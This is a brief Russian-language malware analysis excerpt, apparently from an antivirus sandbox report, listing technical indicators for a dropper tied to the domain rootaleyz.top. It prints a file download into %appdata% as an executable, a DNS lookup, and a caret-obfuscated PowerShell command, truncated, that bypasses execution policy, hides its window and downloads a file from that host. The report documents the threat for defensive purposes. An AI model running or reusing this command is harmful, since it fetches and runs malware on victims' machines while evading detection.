Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErSHE^L^l.EX^e ^-^E^Xec^Ut^IONpoLI^C^y B^yp^as^S -^nOP^Rof^ile -wiN^DO^w^St^YLE^ ^hID^deN^ (^ne^W-oBj^e^cT sY^s^TEm^.^nET.WEB^CL^IeNt^).dow^nL^o^a^dFIL^E(^'http://rootaleyz.t...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "POWErSHE^L^l.EX^e ^-^E^Xec^Ut^IONpoLI^C^y B^yp^as^S -^nOP^Rof^ile -wiN^DO^w^St^YLE^ ^hID^deN^ (^ne^W-oBj^e^cT sY^s^TEm^.^nET.WEB^CL^IeNt^).dow^nL^o^a^dFIL^E(^'http://rootaleyz.t...' (со скрытым окном)